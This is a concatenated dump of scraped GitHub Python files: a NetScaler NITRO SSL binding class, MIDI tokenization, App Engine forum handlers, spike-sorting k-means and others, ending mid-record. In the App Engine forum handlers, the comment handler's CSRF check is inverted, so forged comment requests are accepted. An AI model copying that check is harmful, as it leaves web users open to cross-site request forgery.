calcs\n\t\"\"\"\n\n\tis_arr = isinstance(rhat_ob,np.ndarray) and rhat_ob.ndim==2\n\n\tif is_arr:\n\t\tb = 2*np.sum(r_so*rhat_ob,axis=1)\n\t\tc = -1*(d**2 - np.sum(r_so*r_so,axis=1))\n\telse:\n\t\tb = 2*np.dot(rhat_ob,r_so)\n\t\tc = -1*(d**2 - np.dot(r_so,r_so))\n\n\ts = np.sqrt(b**2 - 4*c)\n\tr0 = (-b + s)/2.0\n\tr1 = (-b - s)/2.0\n\n\tif is_arr:\n\t\talpha = np.max(np.vstack((r0,r1)).T,axis=1)\n\t\talpha[alpha<0] = np.nan\n\telse:\n\t\talpha = np.max((r0,r1))\n\t\tif alpha<0:\n\t\t\talpha = np.nan\n\n\treturn alpha\n","repo_name":"bengebre/geo2helio","sub_path":"geo2helio.py","file_name":"geo2helio.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3103313404","text":"import models\n\nclass LineupService:\n def create_lineups(self, match_json):\n dire = []\n radiant = []\n\n if('players' in match_json):\n heroes = match_json['players']\n count = 0\n\n for hero in heroes:\n if count < 5:\n radiant.append(hero['hero_id'])\n else:\n dire.append(hero['hero_id'])\n count += 1\n else:\n radiant_heroes = match_json['radiant']['heroes']\n dire_heroes = match_json['dire']['heroes']\n\n for hero in radiant_heroes:\n radiant.append(hero['id'])\n\n for hero in dire_heroes:\n dire.append(hero['id'])\n\n\n radiant_lineup = models.Lineup(radiant)\n dire_lineup = models.Lineup(dire)\n\n return {\n 'radiant': radiant_lineup,\n 'dire': dire_lineup\n }\n","repo_name":"scsper/dota-lineup-analyzer","sub_path":"old/server/services/lineup_service.py","file_name":"lineup_service.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2623855874","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslvserver_sslpolicy_binding(base_resource) :\n\t\"\"\" Binding class showing the sslpolicy that can be bound to sslvserver.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._policyname = None\n\t\tself._priority = None\n\t\tself._type = None\n\t\tself._polinherit = None\n\t\tself._gotopriorityexpression = None\n\t\tself._invoke = None\n\t\tself._labeltype = None\n\t\tself._labelname = None\n\t\tself._vservername = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service.
    Minimum value = 0
    Maximum value = 65534.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service.
    Minimum value = 0
    Maximum value = 65534\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef policyname(self) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@policyname.setter\n\tdef policyname(self, policyname) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._policyname = policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labelname(self) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labelname.setter\n\tdef labelname(self, labelname) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labelname = labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef vservername(self) :\n\t\tr\"\"\"Name of the SSL virtual server.
    Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@vservername.setter\n\tdef vservername(self, vservername) :\n\t\tr\"\"\"Name of the SSL virtual server.
    Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._vservername = vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef gotopriorityexpression(self) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@gotopriorityexpression.setter\n\tdef gotopriorityexpression(self, gotopriorityexpression) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._gotopriorityexpression = gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef invoke(self) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@invoke.setter\n\tdef invoke(self, invoke) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._invoke = invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef type(self) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert.
    Default value: REQUEST
    Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@type.setter\n\tdef type(self, type) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert.
    Default value: REQUEST
    Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._type = type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labeltype(self) :\n\t\tr\"\"\"Type of policy label invocation.
    Possible values = vserver, service, policylabel.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labeltype.setter\n\tdef labeltype(self, labeltype) :\n\t\tr\"\"\"Type of policy label invocation.
    Possible values = vserver, service, policylabel\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labeltype = labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef polinherit(self) :\n\t\tr\"\"\"Whether the bound policy is a inherited policy or not.
    Minimum value = 0
    Maximum value = 254.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._polinherit\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslvserver_sslpolicy_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslvserver_sslpolicy_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.vservername is not None :\n\t\t\t\treturn str(self.vservername)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslvserver_sslpolicy_binding()\n\t\t\t\tupdateresource.vservername = resource.vservername\n\t\t\t\tupdateresource.policyname = resource.policyname\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\tupdateresource.gotopriorityexpression = resource.gotopriorityexpression\n\t\t\t\tupdateresource.invoke = resource.invoke\n\t\t\t\tupdateresource.labeltype = resource.labeltype\n\t\t\t\tupdateresource.labelname = resource.labelname\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tupdateresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\t\t\tupdateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression\n\t\t\t\t\t\tupdateresources[i].invoke = resource[i].invoke\n\t\t\t\t\t\tupdateresources[i].labeltype = resource[i].labeltype\n\t\t\t\t\t\tupdateresources[i].labelname = resource[i].labelname\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslvserver_sslpolicy_binding()\n\t\t\t\tdeleteresource.vservername = resource.vservername\n\t\t\t\tdeleteresource.policyname = resource.policyname\n\t\t\t\tdeleteresource.priority = resource.priority\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tdeleteresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tdeleteresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, vservername=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch sslvserver_sslpolicy_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not vservername :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tobj.vservername = vservername\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, vservername) :\n\t\tr\"\"\" Use this API to count sslvserver_sslpolicy_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tclass Ecccurvename:\n\t\tALL = \"ALL\"\n\t\tP_224 = \"P_224\"\n\t\tP_256 = \"P_256\"\n\t\tP_384 = \"P_384\"\n\t\tP_521 = \"P_521\"\n\n\tclass Ocspcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Crlcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Type:\n\t\tHANDSHAKE_REQ = \"HANDSHAKE_REQ\"\n\t\tHANDSHAKE_RES = \"HANDSHAKE_RES\"\n\t\tINTERCEPT_REQ = \"INTERCEPT_REQ\"\n\t\tCLIENTCERT_REQ = \"CLIENTCERT_REQ\"\n\t\tSERVERHELLO_RES = \"SERVERHELLO_RES\"\n\t\tSERVERCERT_RES = \"SERVERCERT_RES\"\n\t\tSERVERHELLO_DONE_RES = \"SERVERHELLO_DONE_RES\"\n\t\tREQUEST = \"REQUEST\"\n\n\tclass Labeltype:\n\t\tvserver = \"vserver\"\n\t\tservice = \"service\"\n\t\tpolicylabel = \"policylabel\"\n\nclass sslvserver_sslpolicy_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslvserver_sslpolicy_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslvserver_sslpolicy_binding = [sslvserver_sslpolicy_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslvserver_sslpolicy_binding.py","file_name":"sslvserver_sslpolicy_binding.py","file_ext":"py","file_size_in_byte":12851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"2661690726","text":"import os\nimport torch\nimport numpy as np\nimport copy\nimport partitura as pt\nfrom einops import rearrange, repeat\nimport pandas as pd\nfrom miditoolkit import MidiFile\nfrom einops import repeat\nimport utils as utils\n\n\ndef clip_segs(tokens, cfg):\n \"\"\"clip the token sequence according to segmentation scheme\n\n Return:\n seg_tokens: np.array: (n_segs, seg_length)\n \"\"\"\n\n \"\"\"choose the number of segments to clip\"\"\"\n if cfg.segmentation.seg_type == \"fix_num\":\n n_segs = cfg.experiment.n_segs\n l = int(len(tokens) / cfg.experiment.n_segs)\n elif cfg.segmentation.seg_type == \"fix_size\":\n n_segs = int(len(tokens) / cfg.sequence.max_seq_len) + 1\n l = cfg.sequence.max_seq_len\n\n\n \"\"\"Clip rolls into segments and add padding\"\"\"\n seg_tokens = []\n for i in range(n_segs): \n seg_tokens.append(tokens[ i*l: i*l+l ][:cfg.sequence.max_seq_len])\n return seg_tokens\n\n\ndef pad_segs(seg_tokens, cfg):\n if cfg.sequence.mid_encoding == \"CPWord\":\n seg_tokens = [np.concatenate([seg_token, repeat(np.array([0] * 6), 'd -> k d', k=( cfg.sequence.max_seq_len - len(seg_token)))])\n for seg_token in seg_tokens if seg_token] \n seg_tokens = [np.pad(seg_token, (0, cfg.sequence.max_seq_len - len(seg_token)), mode=\"constant\", constant_values=0)\n for seg_token in seg_tokens]\n return np.array(seg_tokens) # ()\n \n\ndef perfmidi_to_sequence(path, tokenizer, cfg):\n \"\"\"Process MIDI events to sequences using miditok\n - segment the sequence in various segmentation scheme, and then pad the sequences\n \n Returns:\n seg_tokens: (n_segs, max_seq_len)\n \"\"\"\n midi = MidiFile(path)\n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in midi and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n mapping = midi.get_tick_to_time_mapping()\n instrument_track = copy.deepcopy(midi.instruments[0])\n while True:\n # _midi = copy.deepcopy(midi)\n # instrument_track = _midi.instruments[0]\n start, end = (i)*cfg.segmentation.seg_time, (i+1)*cfg.segmentation.seg_time \n midi.instruments[0].notes = [note for note in instrument_track.notes \n if (note.start < len(mapping) and \n (mapping[note.start] < end and (mapping[note.start]) > start))]\n if not midi.instruments[0].notes:\n break\n print(len(midi.instruments[0].notes))\n tokens = tokenizer(midi)[0]\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n i += 1\n else:\n tokens = tokenizer(midi)[0] # (l, )\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg)\n\n seg_tokens = pad_segs(seg_tokens, cfg)\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef musicxml_to_sequence(path, tokenizer, cfg):\n \"\"\"Process musicxml to sequences using miditok\"\"\"\n import warnings\n warnings.filterwarnings(\"ignore\") # mute partitura warnings\n\n try:\n score = pt.load_musicxml(path)\n if \"Kreisleriana,_Op._16/VIII._Schnell_und_spielend/\" in path:\n raise RuntimeError\n except Exception as e:\n print(\"Failed on score {} with exception {}\".format(os.path.splitext(os.path.basename(path))[0], e))\n return None\n \n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in score and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n for i in range(int(score.note_array()['onset_beat'].max() / cfg.segmentation.seg_beat) + 1):\n tokens = tokenizer.track_to_tokens(score, start_end_beat=(i*cfg.segmentation.seg_beat, (i+1)*cfg.segmentation.seg_beat))\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n print(len(tokens))\n else:\n tokens = tokenizer.track_to_tokens(score)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg) \n\n seg_tokens = pad_segs(seg_tokens, cfg)\n\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef batch_to_sequence(batch, cfg, device, tokenizer):\n \"\"\"Map the batch to input token sequences \n\n Args:\n batch (2, b): ([path, path, ...], [label, label, ...])\n Returns: (matrix, label)\n batch_sequence: (b, )\n batch_label: (b, )\n \"\"\"\n files, labels = batch\n b = len(batch[0])\n batch_sequence, batch_labels = [], []\n\n for idx, (path, l) in enumerate(zip(files, labels)):\n # print(path)\n recompute = True\n if cfg.experiment.load_data: # load existing data\n res = utils.load_data(path, cfg)\n if type(res) == np.ndarray: # keep computing if not exist\n seg_sequences = res\n recompute = False\n\n # events = tokenizer.tokens_to_events(list(seg_sequences[0]))\n if recompute:\n if cfg.experiment.input_format == \"perfmidi\":\n seg_sequences = perfmidi_to_sequence(path, tokenizer, cfg)\n elif cfg.experiment.input_format == \"musicxml\":\n res = musicxml_to_sequence(path, tokenizer, cfg)\n if type(res) == np.ndarray:\n seg_sequences = res\n else: # in case that the xml has parsing error, we skip and copy existing data at the end.\n continue\n\n utils.save_data(path, seg_sequences, cfg)\n\n batch_sequence.append(seg_sequences)\n batch_labels.append(l)\n \n if cfg.experiment.tmp:\n example = batch_sequence[10][0, :50]\n for e in tokenizer.tokens_to_events(example):\n print(e)\n # byte_counts = []\n # for piece_segments in batch_sequence:\n # total_bytes = 0\n # for ss in piece_segments:\n # total_bytes += np.array(ss).nbytes\n # byte_counts.append(total_bytes)\n # byte_counts = np.array(byte_counts)\n batch_sequence, batch_labels = utils.pad_batch(b, cfg, device, batch_sequence, batch_labels)\n batch_sequence = torch.tensor(np.array(batch_sequence), device=device, dtype=torch.float32) \n return batch_sequence, batch_labels\n","repo_name":"anusfoil/SymRep","sub_path":"converters/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"36052795392","text":"from handlers.base import BaseHandler\nfrom google.appengine.api import users, memcache\nfrom models.models import Topic, Comment\nimport uuid\nimport datetime\n\nclass TopicAdd(BaseHandler):\n def get(self):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n params = {\"csrf_token\": csrf_token}\n return self.render_template(\"topic_add.html\", params=params)\n\n def post(self):\n user = users.get_current_user()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if not mem_token:\n return self.write(\"Hacker at the doors\")\n\n title = self.request.get(\"title\")\n text = self.request.get(\"text\")\n\n new_topic = Topic(title=title, content=text, author_email=user.email())\n new_topic.put()\n\n return self.redirect_to(\"topic-details\", topic_id=new_topic.key.id())\n\n\nclass TopicDetails(BaseHandler):\n def get(self, topic_id):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n\n topic = Topic.get_by_id(int(topic_id))\n comment = Comment.query(Comment.topic_id == topic.key.id()).order(Comment.created).fetch()\n\n params = {\"topic\": topic, \"comment\": comment, \"csrf_token\": csrf_token}\n\n return self.render_template(\"topic_details.html\", params=params)\n\n\nclass CommentAdd(BaseHandler):\n def post(self, topic_id):\n user = users.get_current_user()\n time = datetime.datetime.now()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if mem_token:\n return self.write(\"Hacker at the doors\")\n\n comment = self.request.get(\"comment\")\n topic = Topic.get_by_id(int(topic_id))\n new_comment = Comment(content=comment, topic_id=topic.key.id(), author_email=user.email(),\n topic_title=topic.title, created=time)\n new_comment.put()\n\n return self.redirect_to(\"topic-details\", topic_id=topic.key.id())","repo_name":"RokP85/7.DN","sub_path":"wd2-boilerplate-master/handlers/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42244718093","text":"\nimport numpy as np\nimport random as rand\nfrom matplotlib import pyplot as plt\nfrom peak_detect import detect_peaks\nfrom time import time\n\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\nfrom scipy.spatial import distance\nimport matplotlib as mpl\nfrom matplotlib.pyplot import cm \n\n\n#########################################################\n# The following code apply K-means algorithms to signal\n# by three steps: spike detection, alignment of spikes and k-means algorithm\n\n\n# Question 1: we have to manually set the window length/convolution window, \n# since we use convolution window to find spike, the convolution result may not give\n# us the best estimate\n\n# Question 2: local maximum determines our result in k means\n\n###########################################################################\n\n# process_spike function will detect spikes in input signal and align them :\n# input: \n# signal: the input signal\n# window_len: the manually set length for window in convolution\n# take_window_len: chop off length for spike\n# window_height: the manually set height for window in convolution\n# noise_level: the lower bound parameter in the find local maxima function\n\n# output: the aligned spikes in a 2-D array detected_spikes\n\ndef process_spike(signal, window_len, take_window_len,noise_level, window_height=2):\n\t\n\t################################################\n\t# Step 1: take the absolute value of signal\n\t\n\tsignal_abs=map(abs,signal)\n\t#signal_abs=np.array(signal)**2\n\t\n\t# Step 2: take convolution of the absolute value\n\tweights = np.repeat(window_height, window_len)\n\tconvolution=np.convolve(weights,signal_abs,'same')\n\tconvolution=convolution/window_len\n\n\tplt.plot(convolution)\n\tplt.show()\n\n\t# Step 3: find the indices of local maxima of the convolution\n\tlocal_max=detect_peaks(convolution, mph=noise_level*5, mpd=window_len,threshold=0, edge='rising',\n kpsh=False, valley=False, show=False)\n\n\t# Step 4: locate/save spike vectors\n\tm=len(local_max)\n\tn=take_window_len\n\tdetected_spikes=np.zeros((m,n))\n\tindex=0\n\tfor item in local_max:\n\t\tdetected_spikes[index]=signal[item-take_window_len/2:item+take_window_len/2]\n\t\tindex=index+1\n\tdetected_spikes1=detected_spikes.copy()\n\n\t#return detected_spikes\n\n\t# Step 5: align spikes \n\tk=rand.randint(0,m-1)\n\tmax_location=detected_spikes[k].argmax(axis=0)\n\tfor i in range(0,m-1):\n\t\tspike_max_location=detected_spikes[i].argmax(axis=0)\n\t\tdistance=max_location-spike_max_location\n\t\tdetected_spikes[i]=np.roll(detected_spikes[i],distance)\n\n\treturn detected_spikes\n\n\n\n#######################################################################\n# K_means_spikeDetection function will perform k-means algorithm on \n# aligned spikes\n\n\ndef k_means_spikeDetection(aligned_spikes,num_cluster,iterations=20):\n\t# Initialize spikes with lables\n\tm=aligned_spikes.shape[0]#num of points\n\tn=aligned_spikes.shape[1]#dim of the points\n\t\n\t# Take initialize centers\n\tk=np.random.permutation(m)\n\tinitial_center=np.zeros((num_cluster,n))\n\n\t#return initial_center\n\tfor num in range(num_cluster):\n\t\tinitial_center[num]=aligned_spikes[k[num]]\n\n\t# Main loop:\n\tcenter_vectors=initial_center\n\tfor ite in range(iterations):\n\t\t\n\t\t# Determine clusters by computing the Eculidean distance\n\t\tclusters_distance=distance.cdist(aligned_spikes,center_vectors,'euclidean',p=2)\n\t\tlabel=clusters_distance.argmin(axis=1)\n\t\t\n\t\tclassified_spikes=np.c_[aligned_spikes,label]\n\n\t\t# assign each vector in aligned_spikes a group\t\t\n\t\tfor index in range(0,num_cluster):\n\t\t\tcluster_vector=aligned_spikes[label==index]\n\t\t\tnumber=cluster_vector.shape[0]\n\n\t\t\t# Get new center by averaging vectors in a certain group\n\t\t\tcenter_vectors[index]=1.0/number*np.sum(cluster_vector,axis=0)\t\t\t\n\n\treturn center_vectors,label\n\n\ndef plot_kMeans_clusters(classified_spikes,center_vectors,num_cluster):\n\tcolor=cm.rainbow(np.linspace(0,1,num_cluster))\n\n\tfor i in range(num_cluster):\n\t\tplt.plot(center_vectors[i])\n\t\tplt.savefig('image/classifed_centers.png')\n\n\tfor index_i in range(0,num_cluster):\n\t\tcluster_vector=classified_spikes[classified_spikes[:,-1]==index_i]\n\t\tnumber=cluster_vector.shape[0]\n\n\t\tfor index_j in range(0,number):\n\t\t\t#plt.subplot(index)\n\t\t\tplt.plot(cluster_vector[index_j],color=color[index_i])\n\t\t\t#plt.show()\n\n\t\tplt.savefig('image/clusters.png')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"YueXX/spike-sorting-project","sub_path":"backup_code/k_means_Eculidean2Norm.py","file_name":"k_means_Eculidean2Norm.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21999113490","text":"goods = 